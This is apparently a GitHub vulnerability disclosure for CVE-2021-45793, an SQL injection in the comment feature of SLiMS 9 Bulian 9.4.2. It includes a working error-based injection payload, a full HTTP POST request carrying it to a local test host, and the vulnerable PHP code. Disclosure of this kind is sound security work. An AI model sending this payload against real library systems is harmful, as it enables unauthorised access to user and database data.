Headline
CVE-2021-45793: [Security Bugs] Sql Injection · Issue #123 · slims/slims9_bulian
Slims9 Bulian 9.4.2 is affected by SQL injection in lib/comment.inc.php. User data can be obtained.
SQL injection exists in the lib/comment.inc.php file. There is no effective defense against the comment field, leading to SQL injection attacks.
Ordinary user login “find a book” SQL injection attack in the comments (example:'and/**/1=(updatexml(1,concat(0x3a,(select/**/user())),1) )/**/and/**/'1'='1
)
`SQL Injection request:
POST /index.php?p=show_detail&id=17 HTTP/1.1
Host: 192.168.31.63
Content-Length: 110
Cache-Control: max-age=0
Origin: http://192.168.31.63
Upgrade-Insecure-Requests: 1
DNT: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3; q=0.9
Referer: http://192.168.31.63/index.php?p=show_detail&id=17
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: admin_logged_in=1; ckCsrfToken=QlUPE9DlsBjESqNjH6x7Mb9y7y7cIl24Tq13u7c6; SenayanMember=do2fk5pq9qdkqo1phadksnm0u9
Connection: close
comment=’and//1=(updatexml(1,concat(0x3a,(select//user())),1))//and//’1’=’1
&SaveComment=Save+comment`
`Vulnerable code:
$_sql = "Select c.comment, m.member_name, c.input_date from comment AS c
LEFT JOIN biblio AS b ON b.biblio_id = c.biblio_id
LEFT JOIN member AS m ON m.member_id = c.member_id
WHERE b.biblio_id =".$_detail_id.
"ORDER BY c.last_update DESC";
$commlist = $dbs->query($_sql);
if ($commlist) {
$_all_recs = $commlist->num_rows;
}
if ($_all_recs >0) {
$_page = ($page -1) * $_recs_each_page;
$_sql .= "Limit". $_page. ", ". $_recs_each_page;
$commlist = $dbs->query($_sql);
$_list_comment .=’
‘. $_all_recs. __(' comments available’).’
‘;
while ($_data = $commlist->fetch_assoc()) {
$_list_comment .=’
‘;
$_list_comment .=’
‘.$_data[‘member_name’]. __(' at’). $_data[‘input_date’]. __(' write’).’</ div>’;
$_list_comment .=’
‘. $_data[‘comment’].’
‘;
$_list_comment .=’
‘;
}
$_list_comment .=’
‘.simbio_paging::paging($_all_recs, $_recs_each_page, $int_pages_each_set = 10,’’,’_self’).’
';
}
if (ISSET($_SESSION[‘mid’])) {
// Comment form
$_forms =’
‘;
$_forms .= simbio_form_element::textField(‘textarea’,’comment’,’’,’placeholder="Add your comment" class="comment-input form-control"’).’
';
$_forms .=’’;
$_forms .= \Volnix\CSRF\CSRF::getHiddenInputString();
$_forms .=’’;
return $_list_comment.$_forms;`